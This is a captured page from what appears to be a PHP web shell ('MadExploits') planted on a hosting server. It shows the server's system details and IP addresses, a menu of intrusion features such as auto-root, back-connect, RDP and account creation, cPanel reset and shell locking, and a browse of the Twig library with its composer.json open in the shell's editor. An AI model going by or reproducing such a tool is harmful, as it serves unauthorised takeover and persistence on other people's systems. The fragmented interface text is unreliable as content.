Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
cwpsrv /
var /
services /
twig /
[ HOME SHELL ]
Name
Size
Permission
Action
class
[ DIR ]
drwxr-xr-x
doc
[ DIR ]
drwxr-xr-x
extra
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.editorconfig
224
B
-rw-r--r--
.gitignore
36
B
-rw-r--r--
.php_cs.dist
479
B
-rw-r--r--
.travis.yml
583
B
-rw-r--r--
CHANGELOG
44.1
KB
-rw-r--r--
LICENSE
1.46
KB
-rw-r--r--
README.rst
486
B
-rw-r--r--
composer.json
1.36
KB
-rw-r--r--
composer.lock
9.73
KB
-rw-r--r--
phpunit.xml.dist
814
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "twig/twig", "type": "library", "description": "Twig, the flexible, fast, and secure template language for PHP", "keywords": ["templating"], "homepage": "http://twig.sensiolabs.org", "license": "BSD-3-Clause", "authors": [ { "name": "Fabien Potencier", "email": "fabien@symfony.com", "homepage": "http://fabien.potencier.org", "role": "Lead Developer" }, { "name": "Twig Team", "homepage": "http://twig.sensiolabs.org/contributors", "role": "Contributors" }, { "name": "Armin Ronacher", "email": "armin.ronacher@active-4.com", "role": "Project Founder" } ], "support": { "forum": "https://groups.google.com/forum/#!forum/twig-users" }, "require": { "php": "^7.0", "symfony/polyfill-mbstring": "~1.0", "twig/twig": "^2.3" }, "require-dev": { "symfony/phpunit-bridge": "~3.3@dev", "symfony/debug": "~2.7", "psr/container": "^1.0" }, "autoload": { "psr-0" : { "Twig_" : "lib/" } }, "autoload-dev": { "psr-0" : { "Twig_Tests_" : "test/" } }, "extra": { "branch-alias": { "dev-master": "2.3-dev" } } }
Close